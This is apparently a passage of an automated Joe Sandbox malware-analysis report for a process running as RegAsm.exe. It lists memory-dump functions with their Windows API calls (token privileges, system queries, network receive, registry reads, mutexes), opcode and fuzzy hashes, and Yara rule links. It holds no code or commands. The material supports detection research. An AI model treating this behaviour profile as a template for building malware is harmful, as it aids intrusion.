LdrInitializeThunk.NTDLL ref: 016028C8

Memory Dump Source

Source File: 00000008.00000002.1727248354.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1600000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d167dd894c671de43b740df9409686c340ce53d8df7aa644a9bad1e9ddad188
Instruction ID: 918f1d218397349434fc707da370de589f6df4df3c971ac3a4057e3c3dd819d6
Opcode Fuzzy Hash: 8d167dd894c671de43b740df9409686c340ce53d8df7aa644a9bad1e9ddad188
Instruction Fuzzy Hash: 58717F34A006158FDB19DFB8C8987AEBBF2BF88355F158528D406AB394DF34A845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3AF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DB3AF87

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 2b3a018aeea49cbb4171e6a762de0456ece2e3baa0505f41b8465d6ac2c42d93
Instruction ID: 02844d9ee319b002534fdf5cd9c21020109a5ec42631dad241a323f54fe10288
Opcode Fuzzy Hash: 2b3a018aeea49cbb4171e6a762de0456ece2e3baa0505f41b8465d6ac2c42d93
Instruction Fuzzy Hash: 70219FB5909784AFDB128F25DC44B52BFB4EF06210F09849AE985CF563D371E908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1DB3B0F5

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 754a7743230bc5197f595a51e16760e5cb93715d1b3573d0b5908917af860678
Instruction ID: cc4ad380d03ac67b808704550d6bc79fa0ce7f23b70e17440caacdc55cc365b0
Opcode Fuzzy Hash: 754a7743230bc5197f595a51e16760e5cb93715d1b3573d0b5908917af860678
Instruction Fuzzy Hash: E711D0724097C0AFDB128F14DC45A52FFB0EF06314F0980DAE9848F163C275A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3AF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DB3AF87

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6ac50ac0d057410432c3aba01cb6e27125e16c89754f0eb384bc9aabb4792555
Instruction ID: dd2baf51d1b67f8818a1bc64a7b8fb07ec9414ff4c5a0525a894e4e73534a840
Opcode Fuzzy Hash: 6ac50ac0d057410432c3aba01cb6e27125e16c89754f0eb384bc9aabb4792555
Instruction Fuzzy Hash: B8115E75A003409FDB21CF56D884B56FBE4EF04621F18C46AED4ACB656D335E414DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1DB3A0D5

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 5feb76c02a6da40429c7146478ba04b535a4a4229fa2d8ae7cbb8c7bbd780e0c
Instruction ID: 74ab29469b955e8ecbc5e06615593e7ea9d2b42d36abc29732e8f483d5755c7f
Opcode Fuzzy Hash: 5feb76c02a6da40429c7146478ba04b535a4a4229fa2d8ae7cbb8c7bbd780e0c
Instruction Fuzzy Hash: 87019A71900780AFDB61CF5AD884B52FBA0EF04721F18C4AADD498B656D375E408DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1DB3B0F5

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 71274b6864e44c75d328779f00dd2f719c8e8984fc24b1a8266d956bae46cd1f
Instruction ID: d2e0995c23a41726ef4011c0dd4b46e3258a87771aea31d5bc9970f2107c2ae6
Opcode Fuzzy Hash: 71274b6864e44c75d328779f00dd2f719c8e8984fc24b1a8266d956bae46cd1f
Instruction Fuzzy Hash: DE018B31500740AFDB618F4AD885B22FFA0EF44721F08C49ADD894B65AD375E418DB72

Uniqueness

Uniqueness Score: -1.00%

Function 200132FA, Relevance: 10.0, APIs: 1, Strings: 4, Instructions: 1239libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733
:@pq, xrefs: 200147BE
:@pq, xrefs: 20014BE2
EHkT^, xrefs: 20014F9B, 20014FA0

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq$:@pq$:@pq$EHkT^
API String ID: 2994545307-1419788733
Opcode ID: 4c2fb0b5e54978c0888197092da7840847ace951314a0201c17eb31d1cef6bfe
Instruction ID: e7f7da35131cdac56d4b4f210a0e01c41e4d5185423fdfb5493210d1581fd24f
Opcode Fuzzy Hash: 4c2fb0b5e54978c0888197092da7840847ace951314a0201c17eb31d1cef6bfe
Instruction Fuzzy Hash: 0FD2B574A006298FDB65DF64CC84BADBBF2BB48311F5181E6D80AA7354DB359E82CF11

Uniqueness

Uniqueness Score: -1.00%

Function 2001332A, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 691libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: b7efb07de089cbfae0b7479313f1401f0102a8e177058bb1f3e2df84f10a96e8
Instruction ID: 4c16c313a3a7078ca704712e5c89b7196b8dabef0401f917154f8c3a7b451777
Opcode Fuzzy Hash: b7efb07de089cbfae0b7479313f1401f0102a8e177058bb1f3e2df84f10a96e8
Instruction Fuzzy Hash: 7572C174A006288FDB65DF64DC84AADFBF1FB49211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 2001337E, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 679libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: 1a78af87fe10f1e294adcac106897ea39aa64378d73ca95c55481e3a026115ea
Instruction ID: 4fcece09e803fea38c26fc03788096560a5ceba7b00cbe06857d87fe3d41e0c5
Opcode Fuzzy Hash: 1a78af87fe10f1e294adcac106897ea39aa64378d73ca95c55481e3a026115ea
Instruction Fuzzy Hash: 9372C174A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 200133C9, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 671libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: 0e94be96bcddd22a110fd4818b5c736c7014b31ca187c5b76089e972b5075aeb
Instruction ID: 195f59749127ecbbdbb2a550a3eccb14a18e9611ce0804970a60b4febbf354d5
Opcode Fuzzy Hash: 0e94be96bcddd22a110fd4818b5c736c7014b31ca187c5b76089e972b5075aeb
Instruction Fuzzy Hash: 4572C174A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 2001341D, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 661libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: 6234f38668280395283f4bf1e915df36e4a67472cd247f0af3ec1eecf0316af4
Instruction ID: 72610dc6af191a8dae6b876b8d1ace5ae4ffb5ac28e4ba9a37655dcb4494a9c0
Opcode Fuzzy Hash: 6234f38668280395283f4bf1e915df36e4a67472cd247f0af3ec1eecf0316af4
Instruction Fuzzy Hash: D672C274A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 20013471, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 651libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: a834b96d4ade115c03ea67c990a73f1af516b06bedf2f62fa5608c8bec37697d
Instruction ID: 92ff374134c3536d7f4d83f18253e3fca2808147ae020af6e6a1bc442d31fa7f
Opcode Fuzzy Hash: a834b96d4ade115c03ea67c990a73f1af516b06bedf2f62fa5608c8bec37697d
Instruction Fuzzy Hash: 2B62C274A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 200134C5, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 641libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: 9a1d78f346776b0358ea3726ac978821427b26a16eec651770581e0629838385
Instruction ID: c038db3e0c17fec4f2a4226cb859623e7b8d9a240d218545cde0e38a11944c81
Opcode Fuzzy Hash: 9a1d78f346776b0358ea3726ac978821427b26a16eec651770581e0629838385
Instruction Fuzzy Hash: 1262C274A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 20013519, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 631libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: 5f94ddf832f30b759d64641b9b1687034da141d088d32e625ac549dbda3b6ef1
Instruction ID: 9329e92a3c47d7c979bc20a26829510df4e7aa87dc472af0313e96c99144e9d2
Opcode Fuzzy Hash: 5f94ddf832f30b759d64641b9b1687034da141d088d32e625ac549dbda3b6ef1
Instruction Fuzzy Hash: BB62B274A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 2001356D, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 621libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 200136A2

Strings

:@pq, xrefs: 20013733

Memory Dump Source

Source File: 00000008.00000002.1732466085.0000000020010000.00000040.00000001.sdmp, Offset: 20010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20010000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@pq
API String ID: 2994545307-3329585733
Opcode ID: 2f7bc815ad58869bc7e05005d2310527d94d64c87e4b51ac1b3305643f24ef20
Instruction ID: e075d0b2dc433edfe77eee45390b16aebacf208e0f2fc676630b1ee00d4008b4
Opcode Fuzzy Hash: 2f7bc815ad58869bc7e05005d2310527d94d64c87e4b51ac1b3305643f24ef20
Instruction Fuzzy Hash: 0962B274A006298FDB65DF64DC84AADFBF1FB48211F5181E6E80AA3314DB359E82CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00F72504, Relevance: 1.6, APIs: 1, Instructions: 110
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(?,?), ref: 00F724AD

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 22f7248832fc1484ff225b14dbcd86d05756e716b1a2060fb2a2073a4df48de4
Instruction ID: 72b29860b36ff7fa2be83aedf42c9c0257f65ec3a655d42c797e147e126f03ac
Opcode Fuzzy Hash: 22f7248832fc1484ff225b14dbcd86d05756e716b1a2060fb2a2073a4df48de4
Instruction Fuzzy Hash: 3E31F5B1904384AFE711CF14DC85BA6BFA8EF45330F0884ABE9488F253D374A904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F7285B, Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 00F7292F

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 937677e6d917d6ace43da3f055459376f497f3cbe328b823659fff2fb158f5ed
Instruction ID: 20a70146c4d6e698b8894db296d4fbdf421b567f7d5ddaca09d44411af0b191f
Opcode Fuzzy Hash: 937677e6d917d6ace43da3f055459376f497f3cbe328b823659fff2fb158f5ed
Instruction Fuzzy Hash: F231B471104385AFEB22CB65CC44FA6BFBCEF05310F18899AE9849B182D375A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00F71A81, Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b283a43d9f23825baf3e62dfd0f933999d2a6894cf63ca675b3260f34251c607
Instruction ID: 2bbe95925abc69419f3eb16089b5b6e0d7eba10d3a139a4597cf6dc8f4a4ea8d
Opcode Fuzzy Hash: b283a43d9f23825baf3e62dfd0f933999d2a6894cf63ca675b3260f34251c607
Instruction Fuzzy Hash: 9B317071509780AFE7238F25DC55B56BFB4EF06320F0985DBE9848F1A3C365A809DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F72C0B, Relevance: 1.6, APIs: 1, Instructions: 93
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertGetCertificateChain.CRYPT32(?,00000EB4,?,?), ref: 00F72CCE

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 83819bd3585dcbfb7ab2ef25efe441bed74e31a6f3a05a9e468c568b7308d855
Instruction ID: 2a7ad7490debebb141b3fbb869a5350f325859332ab393e5be00309edc38a75c
Opcode Fuzzy Hash: 83819bd3585dcbfb7ab2ef25efe441bed74e31a6f3a05a9e468c568b7308d855
Instruction Fuzzy Hash: 8E316D7150D3C45FD7138B258C61B62BFB4EF47614F1A84DBD8848F1A3D624A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F72B0D, Relevance: 1.6, APIs: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72BC1

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: e22441b27d1fa780382dd21e6e98e36c1152249e4204fbed87483f89bd271739
Instruction ID: 5b926cb1ff326e2758cb2ded10d8f1c0f115f092a2148b1d3fcb26f649891280
Opcode Fuzzy Hash: e22441b27d1fa780382dd21e6e98e36c1152249e4204fbed87483f89bd271739
Instruction Fuzzy Hash: 6E316171505784AFEB228F25DC44F52BFB8EF46310F08849AE9859B162D334E909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 01602827, Relevance: 1.6, APIs: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016028C8

Memory Dump Source

Source File: 00000008.00000002.1727248354.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1600000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f72b61f9253c9f73404020990c9b01cc820bc8f6528c929619c079632c2eaa6
Instruction ID: 66c87b96825e9a79e000e455d26319b6ec96a201ecb838b0a844fa068b5c4cd4
Opcode Fuzzy Hash: 8f72b61f9253c9f73404020990c9b01cc820bc8f6528c929619c079632c2eaa6
Instruction Fuzzy Hash: 5431A034A04359CFD70ADF78C8A97AE7BF2AF45304F258069D406EB391D7359846CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A8D9, Relevance: 1.6, APIs: 1, Instructions: 90
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB3A989

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 46c3e1c1a2f475754d07889f308efdd3e0784186e5c80a66f7cfae69af59eeed
Instruction ID: 80567d188a57fc011967d21537a1b096b97aca93ea3fdb87b6c18c8b0db1b442
Opcode Fuzzy Hash: 46c3e1c1a2f475754d07889f308efdd3e0784186e5c80a66f7cfae69af59eeed
Instruction Fuzzy Hash: 1D3182B25087846FE7228F15CC84F67BFBCEF05310F09859AE9859B152D224E949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00F70B84, Relevance: 1.6, APIs: 1, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00F70C25

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5575ca619479c1a1131118fd047453a76201d2941c1973c238565a7e2bcdc757
Instruction ID: a0d5be94fe1c80022dd46553d32b5a47e8706c54d3b504b190dae6119baf3780
Opcode Fuzzy Hash: 5575ca619479c1a1131118fd047453a76201d2941c1973c238565a7e2bcdc757
Instruction Fuzzy Hash: B4317EB1504340AFE722CF25DD44B66BFE8EF05320F0885AEE9858B252D375E805DB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 1DB3AA8C

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5ad449b876c0f20db5ca41656a168a8ea60ac408ec19a7607588023f3347d780
Instruction ID: ba36e518ed819f9c53c86e32cdbcb6b4d15ab4172182b8a9fe74744cbdad7dca
Opcode Fuzzy Hash: 5ad449b876c0f20db5ca41656a168a8ea60ac408ec19a7607588023f3347d780
Instruction Fuzzy Hash: F03193725097846FE722CF25CC84F63BFE8EF06710F18849AE985DB153D264E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F71EC0, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 00F71F57

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 0704a25a103936cfee2e0e81c69b9e083b0cd35b7059589cfc238440d936ed8d
Instruction ID: 03ea3bf364bbf8688f5c9b2855aa597746c79ab9c2d1fe67b2fb1620eee4e2be
Opcode Fuzzy Hash: 0704a25a103936cfee2e0e81c69b9e083b0cd35b7059589cfc238440d936ed8d
Instruction Fuzzy Hash: 263195715043456FE721CF29DC45FA7BFE8EF05320F0884AAE944DB152D324E819CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5576, Relevance: 1.6, APIs: 1, Instructions: 87threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00FB5615

Memory Dump Source

Source File: 00000008.00000002.1726286402.0000000000FB5000.00000040.00000001.sdmp, Offset: 00FB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_fb5000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: db923f3d8fc111881293f7206e0796f3f28b89684ab07a9101821b89104f26b1
Instruction ID: be071a4b3361a7cf5f0ae5f2afc87c165bdb317c5ed8d4790f1b54342ace9a36
Opcode Fuzzy Hash: db923f3d8fc111881293f7206e0796f3f28b89684ab07a9101821b89104f26b1
Instruction Fuzzy Hash: 43214C35008B07D1C7981A088E381EAFFE1AF4B21AB706180C7D9098E08F334CC5E318

Uniqueness

Uniqueness Score: -1.00%

Function 00F71DC2, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F71E6C

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: abc9e0d15ae38488d2a1b0cf7791c9b6ae381e09a79b1b003b9a398cff7ccf92
Instruction ID: 3f8c2bcfa8ffd22dba1672f7f5a89617aaa23b589f7d022d61838a99efcc7584
Opcode Fuzzy Hash: abc9e0d15ae38488d2a1b0cf7791c9b6ae381e09a79b1b003b9a398cff7ccf92
Instruction Fuzzy Hash: EB3150725097806FDB22CB25DC44F92BFB8EF06310F0884DBE9859B153D264E949DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F72158, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00F7220A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 14a294329fd4a52d1ce1f6e27061b8f2e8d217118fcef8ba0e05214cc79e76b6
Instruction ID: 211a7bc2aa8fb42760516beb5050528b62a7adbd755cd89211d7108a6a2674e2
Opcode Fuzzy Hash: 14a294329fd4a52d1ce1f6e27061b8f2e8d217118fcef8ba0e05214cc79e76b6
Instruction Fuzzy Hash: D43191B2404780AFE722CB55DD45F56FFF8EF06320F08859AE9849B163D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F7240D, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 00F724AD

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 443dd2f690b808cbeafd52c65d57bfc1c39dff3130405ac2765215ee52b5cff0
Instruction ID: 85121ae78cd04a1683f81044ec03158ba0473ae6e26097e2d6285423de0ef882
Opcode Fuzzy Hash: 443dd2f690b808cbeafd52c65d57bfc1c39dff3130405ac2765215ee52b5cff0
Instruction Fuzzy Hash: C03182B1509780AFE722CF25DC45F56FFE8EF05310F08849AE9848B292D365E904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F71598, Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F71634

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5040d2c8dd5a902359c3da3ba9f3b2e2541d76dd6484bff5f994dc1f384871ec
Instruction ID: c2f78b4673a6cf718b8777dedddcb63b19e4f918af3fb1a0c9095ba5cc73e55d
Opcode Fuzzy Hash: 5040d2c8dd5a902359c3da3ba9f3b2e2541d76dd6484bff5f994dc1f384871ec
Instruction Fuzzy Hash: 2D214FB1509380AFD7228F65DC44F57BFB8EF46720F08849BE985DB192D264E848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F7288A, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 00F7292F

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
